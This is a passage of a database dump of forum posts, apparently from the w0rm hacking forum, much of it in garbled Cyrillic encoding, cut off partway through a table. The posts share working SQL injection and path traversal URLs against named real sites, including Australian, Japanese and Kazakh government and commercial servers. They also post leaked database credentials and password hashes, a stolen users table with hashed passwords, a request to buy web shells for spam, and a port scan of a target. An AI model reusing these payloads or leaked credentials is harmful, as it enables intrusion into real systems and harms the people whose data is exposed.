(1155, 1096, 0, 'Kingbeef', 3, 'ÃœÞ Ãšð÷ðхÑÂтðýð.', 1404145216, '[url]http://mod.gov.kz/phpmyadmin/[/url]\r\n\r\nmod_kz: *05DF0E762EB37A1DDC27CC0624DF38ABEE907A44\r\nqadmin: *95C1A41C12A20FC7574B636616B8E9137A00F6E5\r\nroot: *E904E1852A968422BBC6A4A5E995322FD25CBF99', 1, 0, '109.62.244.155', 0, 1, 0, 0, 0),
(1161, 1089, 1159, 'w0rm', 1, '', 1404148464, 'Køýь ÑÂÿûþõýт.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1162, 1093, 1148, 'w0rm', 1, '', 1404153881, 'syslink, try to speak with him plz', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1163, 1089, 1161, 'Psych0tr1a', 11, '', 1404154995, 'ýðÿøÑÂðý ýð php\n\nñõрõü custnumber ø÷ фðùûð\n\n[url]http://*forum[/url] path*/install/update.php\n\nø ôðûõõ ÿþôÑÂтðòÃȄÂõü òÑÂÑ‘ ò ÑÂÿûþõýт', 1, 0, '79.139.233.12', 0, 1, 1, 0, 0),
(1164, 1015, 1019, 'Psych0tr1a', 11, '', 1404161068, '[QUOTE=w0rm;1019]- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih.ms\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- rdot\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\n[URL=\"https://www.dropbox.com/s/d6y388k6e9eum1h/%D0%9C%D0%B0%D0%BA.zip\"]download[/URL][/QUOTE]\r\n\r\nçþтþ ðÑÂõчúøýþóþ ôðüÿð тðú ø ýõ þñýðруöøû\r\núÑÂтðтø þýð уöõ рøÿ\r\n\r\n[url]http://asechka.ru/[/url]', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0),
(1165, 1093, 1162, 'syslink', 13, '', 1404164681, 'email sent, waiting on response', 1, 0, '188.28.201.98', 0, 1, 0, 0, 0),
(1166, 1097, 0, 'Psych0tr1a', 11, 'Vulnerabilities in Australian goverment Bureau of Meteorlogy', 1404204058, 'SQLi [PostgreSQL]\r\n[code]http://www.bom.gov.au/water/regulations/report.php?personid=999999.9%20union%20all%20select%20null,chr(126)||chr(39)||(select%20c.relname%20from%20waterregs_2012.pg_catalog.pg_class%20c%20LEFT%20JOIN%20waterregs_2012.pg_catalog.pg_namespace%20n%20ON%20n.oid%20=%20c.relnamespace%20where%20c.relkind%20IN%20(chr(114),Null)%20and%20n.nspname%20NOT%20IN%20(chr(112)||chr(103)||chr(95)||chr(99)||chr(97)||chr(116)||chr(97)||chr(108)||chr(111)||chr(103),%20chr(112)||chr(103)||chr(95)||chr(116)||chr(111)||chr(97)||chr(115)||chr(116))%20and%20waterregs_2012.pg_catalog.pg_table_is_visible(c.oid)%20limit%201%20offset%2011)||chr(39)||chr(126),null,null,null,null,null,null,null,null,null,null,null--[/code]\r\n\r\n\r\nFile path traversal\r\n[code]http://210.8.119.235/aviation/php/product.php?id=../../../etc/passwd[/code]', 1, 0, '79.139.233.12', 0, 1, 0, 0, 0),
(1168, 1064, 1114, 'w0rm', 1, '', 1404229089, '.dk ÿрøþÑÂтðýþòûõýýþ, уöõ òыÑÂûðýþ ÿþрÑÂôúð 50ú öôõü òыÿûðт.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1587, 1438, 0, 'Invite', 2, '{$name}', 1407964994, '[SIZE=\'4\'][COLOR=\'Sienna\']testa[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: testa@yopmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.13.141.191\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://testa.ac.uk | testa.ac.uk \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1170, 1099, 0, 'w0rm', 1, 'SSL - https://w0rm.pw', 1404233847, 'ÿþÑÂтðòøû ÑÂõртõфøúðт - тõÿõрь ýðѠýõ ÿþôÑÂûушðют)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1171, 1100, 0, 'Psych0tr1a', 11, 'ãÑÂ÷òøüþÑÂтø ò osCShop Webshop þт osCommerce', 1404235052, '[B]Vulnerability type:[/B] [Mysql error based injection]\n[B]Google dork:[/B]\n[code]https://www.google.ru/#newwindow=1&q=filetype:php inurl:\"infopages.php\" inurl:\"info_id=\"[/code]\n\n[B]Example:[/B]\n[code]http://www.dyrenesno1.dk/infopages.php?info_id=-4\'or(extractvalue(1,concat(0x3a,user())))=\'[/code]\n\nÚðúøõ úþýúрõтýþ òõрÑÂøø уÑÂ÷òøüы ÿþúð ýõø÷òõÑÂтýþ.', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0),
(1173, 1101, 0, 'w0rm', 1, 'https://w0rm.in - тõÑÂтøрþòðýøõ', 1404240222, 'тõÑÂтøруõü ýð ÿрþýøúýþòõýøõ þÑÂýþòýþù ÑÂúрøÿт ýðшõóþ ÿрþõúтð, ýðхþôúø þтÿøÑÂыòðõü ò ÑÂтþù тõüõ.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1179, 1101, 1178, 'null', 9, '', 1404298577, 'Ã’ ÿрþфøûõ ðúтøòýðѠxss\nÒþ òÑÂõх ÿþÃȄÂÑ… üþöýþ òÑÂтðòøть\nclick me! \n[QUOTE][url]https://w0rm.in/manageuser.php?action=profile&id=3[/url]\n\n[/QUOTE]', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1177, 1101, 1173, 'Psych0tr1a', 11, '', 1404293775, 'ÃÂúтøòýðѠxss ÿрø ÑÂþ÷ôðýøø ÑÂþþñщõýøѠ\r\n\r\nURL Ñ xss :\r\n[code]https://w0rm.in/managemessage.php?action=showproject&id=6[/code]\r\n\r\nãÑÂ÷òøüыõ ÿþûѠ:\r\n[code]Title:\r\nText:[/code]\r\n\r\n\r\nтõúÑÂÑ‚ ÑÂþþñщõýøÑÂ:\r\n[code] [/code]', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0),
(1178, 1101, 1177, 'Psych0tr1a', 11, '', 1404297135, 'ßðÑÂÑÂøòýðѠxss ÿрø чðттøýóõ\n\n[code]https://w0rm.in/managechat.php?userto=root &uid=1[/code]', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0),
(1180, 1101, 1179, 'null', 9, '', 1404299732, 'ßрø рõôðúтøрþòðýøø ÿрþфøûѠуúð÷ыòðõü ò User payload ø ýð òÑÂõü ÑÂðùтõ у ýðѠðúтøòýðѠxss ò ýøúõ', 1, 0, '78.85.33.48', 0, 1, 0, 0, 0),
(1181, 1101, 1180, 'w0rm', 1, '', 1404315258, 'ÿрõôûþöõýøѠÿþ фøúÑÂу Ѡÿрøüõрðüø...', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1182, 1101, 1181, 'Psych0tr1a', 11, '', 1404316312, '[QUOTE=w0rm;1181]ÿрõôûþöõýøѠÿþ фøúÑÂу Ѡÿрøüõрðüø...[/QUOTE]\r\n\r\n\r\nòþт тут õÑÂть þñ ÑÂтþü \r\n\r\n[url]http://wp-kama.ru/id_24/menyaem-simvolyi-html-na-spetssimvolyi-pri-kommentirovanii.html[/url]\r\n\r\nâþûьúþ ýðôþ õщё üõýÑÂть \" ýð " òрþôõñы \r\nòþ÷üþöýþ þшøñðюÑÂÑŒ', 1, 0, '91.78.162.176', 0, 1, 0, 0, 0),
(1183, 1101, 1182, 'kx00', 6, '', 1404320932, '[QUOTE=Psych0tr1a;1182]\r\nâþûьúþ ýðôþ õщё üõýÑÂть \" ýð " òрþôõñы \r\nòþ÷üþöýþ þшøñðюÑÂÑŒ[/QUOTE]\r\n\r\nты ÑÂþòõршõýýþ ÿрðò.', 1, 0, '77.95.63.68', 0, 1, 0, 0, 0),
(1194, 1111, 0, 'Invite', 2, 'new invite', 1404450631, '[b]Name[/b]: 500mhz\r\n [b]Age[/b]: 120\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: c500mhz@gmail.com\r\n [b]Info[/b]: .', 1, 0, '94.153.230.50', 0, 1, 0, 0, 0),
(1193, 1110, 0, 'Invite', 2, 'new invite', 1404426305, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1196, 1113, 0, 'Kingbeef', 3, 'china.cn', 1404458824, 'äøûьтруõтÑÂÑ \"_\" \"/\"\r\n[url]http://www.china.cn/tiaomashebei/2792561523.html\'or(ExtractValue(1,concat(0x3a,(select(version())))))=\'1[/url]\r\nÜþöõт úтþ ÑÂñрутøт тðñûøцы ø úþûþýúø?\r\n\r\n[IMG]http://data3.floomby.com/files/previews/4_7_2014/9/oeBowYndFE2chjpsGBhNDQ.jpg[/IMG]', 1, 0, '109.62.134.58', 0, 1, 0, 0, 0),
(1197, 1114, 0, 'Invite', 2, 'new invite', 1404461560, '[b]Name[/b]: Your namewestside\r\n [b]Age[/b]: 41\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: walqry@mail.ru\r\n [b]Info[/b]: .', 1, 0, '193.169.36.21', 0, 1, 0, 0, 0),
(1198, 1115, 0, 'Invite', 2, 'new invite', 1404461645, '[b]Name[/b]: Ivan\r\n [b]Age[/b]: 25\r\n [b]ICQ[/b]: \r\n [b]e-mail[/b]: ivan@jabbos.org\r\n [b]Info[/b]: .', 1, 0, '95.31.7.31', 0, 1, 0, 0, 0),
(1199, 1116, 0, 'Invite', 2, 'new invite', 1404467368, '[b]Name[/b]: Your name\r\n [b]Age[/b]: Age\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: e-mail\r\n [b]Info[/b]: .', 1, 0, '128.69.199.94', 0, 1, 0, 0, 0),
(1205, 1113, 1196, 'w0rm', 1, '', 1404504468, 'fixed ÿþüþõüу', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1212, 1128, 0, 'Invite', 2, '{$name}', 1404508694, '[b]Name[/b]: l;l;\'\r\n [b]Age[/b]: \r\n [b]ICQ[/b]: l;l\';\r\n [b]e-mail[/b]: ll\';l\';\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. You can also leave a jabber and other alternative addresses to communicate, in a word, everything that you think it necessary to bring to our attention. The minimum length of 200 characters, the maximum 4000.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(3048, 2508, 0, 'hunter_exploitkit', 172, 'Need to buy traffic or web shell', 1464450174, 'Hello\r\nI\', So Sorry for make this Thread\r\n\r\nI need to buy traffic or web shell(use for spam)\r\nI not have problem to payment and money value\r\n\r\nif anyone Have this service Please contact me\r\n\r\n[email]Exploitkit@jabb3r.org[/email]\r\n\r\n\r\n\r\nKing Regard\r\nHunter Ekit', 1, 0, '2.187.44.21', 0, 1, 0, 0, 0),
(3049, 2508, 3048, 'ke7hb', 387, '', 1464451741, 'hi, I have contact for traffic \r\n\r\n[email]data2z@swissjabber.org[/email] is my temp jid.', 1, 0, '85.25.103.69', 0, 0, 0, 0, 0),
(3050, 2509, 0, 'ke7hb', 387, 'D+P seller = banned!', 1464452024, 'Dump + PIN discussions are disallowed & banned from w0rm.WS market.\r\n\r\nWhy sell money for less money? BULLSHIT.', 1, 0, '85.25.103.69', 0, 1, 0, 0, 0),
(1215, 1113, 1205, 'Kingbeef', 3, '', 1404534417, '[QUOTE=w0rm;1205]fixed ÿþüþõüу[/QUOTE]\r\n\r\nNo.\r\n[IMG]http://data3.floomby.com/files/previews/5_7_2014/6/4KFee0v6N06AIjnjHsQeQQ.jpg[/IMG]', 1, 0, '109.62.200.29', 0, 1, 0, 0, 0),
(1615, 1450, 0, 'Invite', 2, '{$name}', 1408180050, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@1111.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1219, 1015, 1164, 'w0rm', 1, '', 1404664875, 'Starting Nmap 6.46 ( [URL]http://nmap.org[/URL] ) at 2014-07-06 20:37 MSK\nNmap scan report for asechka.ru (5.187.2.104)\nHost is up (0.083s latency).\nrDNS record for 5.187.2.104: hivede17-2487.fornex.org\nNot shown: 985 closed ports\n[QUOTE]PORT STATE SERVICE\n21/tcp open ftp\n22/tcp open ssh\n25/tcp open smtp\n53/tcp open domain\n80/tcp open http\n110/tcp open pop3\n139/tcp open netbios-ssn\n143/tcp open imap\n443/tcp open https\n445/tcp open microsoft-ds\n993/tcp open imaps\n995/tcp open pop3s\n2525/tcp open ms-v-worlds\n3306/tcp open mysql\n8080/tcp open http-proxy[/QUOTE][URL]https://5.187.2.104/[/URL]\n\nþýø òøôøüþ ÿõрõýðÿрðòøûø ýð ôруóþù øÿ', 1, 0, '95.71.202.14', 0, 1, 0, 0, 0),
(1220, 1101, 1183, 'w0rm', 1, '', 1404676870, 'Fixed, чõúðõü.', 1, 0, '178.44.231.197', 0, 1, 0, 0, 0),
(1221, 1132, 0, 'Invite', 2, 'New invite', 1404694277, '[b]Name[/b]: 123\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: 23\r\n [b]e-mail[/b]: 2321\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. You can also leave a jabber and other alternative addresses to communicate, in a word, everything that you think it necessary to bring to our attention. The minimum length of 200 characters, the maximum 4000.\r\n .', 1, 0, '178.44.186.142', 0, 1, 0, 0, 0),
(1222, 1133, 0, 'Invite', 2, 'New invite', 1404776933, '[b]Name[/b]: Nickname\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: Email\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '178.45.192.201', 0, 1, 0, 0, 0),
(1223, 1134, 0, 'w0rm', 1, 'фþрüð ÿþôðчø ÷ðÑÂòúø', 1404782723, '[url]https://w0rm.in/index.php?site=joinus[/url]\n\nØ÷üõýøû òýõшýøù òøô+ ÿрøúрутøû úðÿчу ýð рðôþÑÂть ðúуýõúøúÑÂýыü хðúõрðü.', 1, 0, '178.44.232.204', 0, 1, 1, 0, 0),
(1224, 1083, 1151, 'Bo0om', 7, '', 1404788657, '[QUOTE=unknown_evil;1150]ÃÂуöýð рðñþчðѠSql øûø ôðüÿ ñð÷ы?[/QUOTE]\r\n\r\náúуÃȄÂ\r\n\r\n[QUOTE=unknown_evil;1151]Òþт ýþрüðûьýðѠÑÂúуûѠòÑÂõ ôþÑÂтðõтÑÂѠýð ãà ð!\r\n[/QUOTE]\r\n\r\n\r\nÓрðц, ÑÂûøòðù, ÿøшø ò öðñу, [email]mb@exploit.im[/email]\r\nрð÷óþòðрøòðù þ цõýõ.', 1, 0, '176.209.48.92', 0, 1, 0, 0, 0),
(1586, 1437, 0, 'Invite', 2, '{$name}', 1407956085, '[SIZE=\'4\'][COLOR=\'Sienna\']Google[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: pascalorangina@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 180.28.251.16\n[*][b]real ip[/b]: 180.28.251.16\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/0E06A0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : google : y14mer@hotmail.com : : 2198469cc649add6e62dc9ea1fafd187\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://google.org | google.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1359, 1083, 1292, 'BigBear', 34, '', 1407360508, '[url]http://rakuten.co.jp[/url]\r\n[url]http://www.caribbeancom.com/index2.htm[/url] \r\n[url]http://550909.com/oni01[/url] [url]http://happymail.co.jp/[/url]\r\n[url]http://www.toranoana.jp/bl/[/url]\r\n[url]http://mosimosi.bz/bg/sp/?pr=rpg007[/url]\r\n[url]http://0783a.com/pc/02/?pr=nfo.c[/url]\r\n\r\nÞт 1ú ø òышõ.\r\n\r\nÃÂуöýы üыûьýøúø, üþöýþ òытÑÂýуть чõрõ÷ ÑÂúуûø ø тô ø тÿ.\r\n\r\nâþ, чтþ уöõ ÑÂüþó ýðùтø.\r\n\r\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../etc/passwd%00.jpg[/url]\r\n\r\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../web/cgi-bin/login.cgi%00.jpg[/url]\r\n\r\nrequire \"/web/plib/R2/libcommon.pl\";\r\nrequire \"/web/plib/libenv.pl\";\r\nrequire \"/web/plib/libhtml.pl\";\r\nrequire \"/web/plib/R2/libcookie.pl\";\r\nrequire \"/web/plib/R2/libdatabase.pl\";\r\nrequire \"/web/plib/sql_regist.pl\";\r\nrequire \"/web/plib/libutil.pl\";\r\nrequire \"/web/plib/jcode.pl\";\r\nrequire \"/web/plib/librate.pl\";\r\nrequire \"/web/cgi-bin/get_hosp.pl\";\r\nrequire \"/web/cgi-bin/get_cgi_frame_templ.pl\";\r\n\r\n# $Id: libdatabase.pl 60 2005-07-07 11:58:38Z funa $ #\r\n\r\nmy $FMOS_IP=\"FMOS\";\r\nmy $FMOS_ID=\"ectora\";\r\nmy $FMOS_PW=\"ec2004\";\r\n\r\nmy $IMOS_IP=\"IMOS\";\r\nmy $IMOS_ID=\"ectora\";\r\nmy $IMOS_PW=\"ec2004\";\r\n\r\nmy $FMOSR_IP=\"FMOSR\";\r\nmy $FMOSR_ID=\"ectora\";\r\nmy $FMOSR_PW=\"ec2004\";\r\n\r\nßþ ôруóøü рõÑÂурÑÂðü - SQL øýъõúцøѠтþûьúþ ò ÑÂтþü.\r\n\r\n[url]http://www.caribbeancom.com/ranking_v2.php?cat_id=4+and+1=2+union+select+1,2,3,444,concat(\'00\',0x3a,version()),666,777,888,999,10+--+[/url]', 1, 0, '91.105.185.0', 0, 1, 0, 0, 0),
(1226, 1136, 0, 'Invite', 2, 'New invite', 1404809228, '[b]Name[/b]: traliaaaaa\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: ICQ/Jabber\r\n [b]e-mail[/b]: irmansassz@gmail.com\r\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '78.60.193.34', 0, 1, 0, 0, 0),
(1228, 1138, 0, 'w0rm', 1, 'AntiDDoS', 1404883312, 'ÃÂðÑÂтрþøû ÑÂõрòõр, Ñ€ÑÂô ÿрþóрðüýых +ÿõрõúþýфøýурðцøѠÑÂôрð + ýðÑÂтрþùúð iptables, ÿþúð òыôõрöøòðõü DDoS.', 1, 0, '95.71.228.124', 0, 1, 0, 0, 0),
(1229, 1139, 0, 'Invite', 2, 'New invite', 1404937164, '[b]Name[/b]: PurePass\r\n [b]Age[/b]: \r\n [b]ICQ/Jabber[/b]: purepass@jabber.no\r\n [b]e-mail[/b]: PurePass@inbox.com\r\n [b]Info[/b]: sqlmap, vega, nmap, zenmap, arachni, w3sf and many pentest tools. html, php designer and pentester 8 years old...\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n .', 1, 0, '151.236.19.87', 0, 1, 0, 0, 0),
(1233, 1142, 0, 'mb1', 25, 'cinemablend.com', 1405026721, 'ÃÂуöýþ рðÑÂхõшøть ø ÷ðûøть шõûû. âрðф ÿþôõûøü.\r\n\r\n[url]http://www.cinemablend.com/admin/features_view.php?cid=6[/url] \r\n\r\n\r\nDatabase: filmhobb_engine\r\nTable: users\r\n[123 entries]\r\n+------------------------------------------+---------------------------+-------\r\n-+\r\n| pass | login | level\r\n|\r\n+------------------------------------------+---------------------------+-------\r\n-+\r\n| 3b31d3ad5c2f7e40bbd94ab82294d8f977bbd6eb | filmhobbit | a\r\n|\r\n| 4fd59b289e1a8049fe9aa341dec5f0adb1eacd81 | mattnorris | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rrafe | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rbzzz | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rnewsreporter | r\r\n|\r\n| a43a94343913cebf55991fd4de89092995328bd3 | rhandynet | wr\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | r | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredbryce | r\r\n|\r\n| a2a44222752854225809d6253b057050c16ba5d8 | RETIREDrstuart | re\r\n|\r\n| 1a7f188adf52fc676cc970eac52d068b17c21da2 | RETIRED - rInto | r\r\n|\r\n| 292dccba02d72fb02390b2d2e727743ff47b7b40 | Rlecari | r\r\n|\r\n| 7c4c7e94ce5a0da4810bd79310202c1f612cc624 | scott | ne\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredsandy | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rfredretired | r\r\n|\r\n| 70c8feacb7c00e556156caed2d79d90c34a000c3 | rmargaret | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rlexi | r\r\n|\r\n| 68c6cc627e9392612837c7c43b6e1a664550d4b8 | kelly | a\r\n|\r\n| 662be2b09a6db9471e92dc195581f9ff1db054fc | redwardp | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredmichael | r\r\n|\r\n| 6c2c9e03aefd5bd0aea3bc38d0542dd41b07ee83 | rrdavidwharton | r\r\n|\r\n| 94d8fd46b751e0ce5b4f88bb7a813601df6d1a24 | rjasonmorgan | wr\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rRETIREDedwarddarell | w\r\n|\r\n| a69c3de8a972a4aaa5e9169680e2c0d591af9420 | rmatts | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rRETIRED - nikkipierce | r\r\n|\r\n| a12380c0112978bbe7d4095b1622eddb7ebb8837 | rkateyrich | w\r\n|\r\n| b77868c9c5dd41a0c6351d5f6a67e13361222146 | richknight | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rbrianlisi | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjoncostantino | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjaradwilk | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rtimpeterson | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjeffrichard | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rchristinatrischetti | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjaneboursaw | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjdmcnamara | wr\r\n|\r\n| cf84ed447d7127e649e5a84de3b0ab35fcdcef5c | rmonicacastillo | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rretiredfelixvasquez | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjeffharris | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rtimberinger | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rremarahman | r\r\n|\r\n| e4775e5fbe65bc451e2c4d8cc29d5fd69b16e4c7 | petehaas | se\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rmarianamcconnell | wr\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rjonathanstulce | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rpeterkimmich | r\r\n|\r\n| 1fee7112f4b0f1910116234e33b46533d3c9d754 | jessicagrabert | ae\r\n|\r\n| bac1ce497b1a27049244369565aef7767244d083 | rdvdnews | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rRETIREDlorikapes | w\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | ramandamacarthur | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rphilipcheung | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rglenboyd | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rdvdreviewer | w\r\n|\r\n| 77b577c24b2b608ac581e3f1ba958faf08616797 | rdustinchristian | r\r\n|\r\n| ab93893255d62788fa93e9d6b41048c883b0201d | rerindougherty | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rcbstaff | r\r\n|\r\n| 0fe178f9f5d08fbf40acb9754e13455a3455259b | rffafawfasdfasdfgaming | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredalexandra | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredblairschulman | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredbrian | r\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rretiredbrendan | wr\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rmichaelholcomb | w\r\n|\r\n| bfbe3489a4ab62149c818f205969728d45f0cc91 | rfrancktabouring | w\r\n|\r\n| 